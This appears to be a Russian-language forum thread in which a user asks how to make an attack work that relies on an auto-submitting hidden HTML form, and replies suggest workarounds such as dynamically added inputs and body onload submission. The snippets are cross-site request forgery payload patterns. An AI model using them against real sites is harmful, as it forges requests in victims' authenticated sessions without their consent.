Вариант 1: PHP: <form id="F1"> <input type="text" name="submit" value="1234" /> </form> <script> document.getElementById('F1').submit(); </script> Вариант 2: PHP: <form id="F1"> <input type="text" name="admin" value="1234" /> </form> <script> document.getElementById('F1').submit(); </script> Так вот 1-ый вариант не работает из-за того, что мы переопределили submit, хотя с вторым всё нормально. Вариант 3: PHP: <form id="F1" method="post" action="http://127.0.0.1/m"> <script> var abc = document.getElementById('F1').submit(); </script> <input type="text" name="abcd" value="1234" /> <input type="submit" name="dd" value="f1234" /> </form> <script> abc(); </script> ...вообще не отправляет данные. Вопрос, как в таком случае можно реализовать атаку. Как-бы элементы не создавались(Напрямую в DOM аналогично), атака не удается. Нажим на кнопку формы браузеры блокируют. Firefox 17
HTML: <form id="F1"></form> <script> var echo = function() { var input = document.createElement("input"); input.value = "asdadasdasd"; input.name = "submit"; document.getElementById("F1").appendChild(input); } document.getElementById('F1').submit(echo()); </script>
HTML: <body onload="document.getElementById('F1').submit();"> <form id='F1' action=""> <input type="text" name="admin" value="1234" /> <input class="defbutton" type="submit" > </form> Как вариант
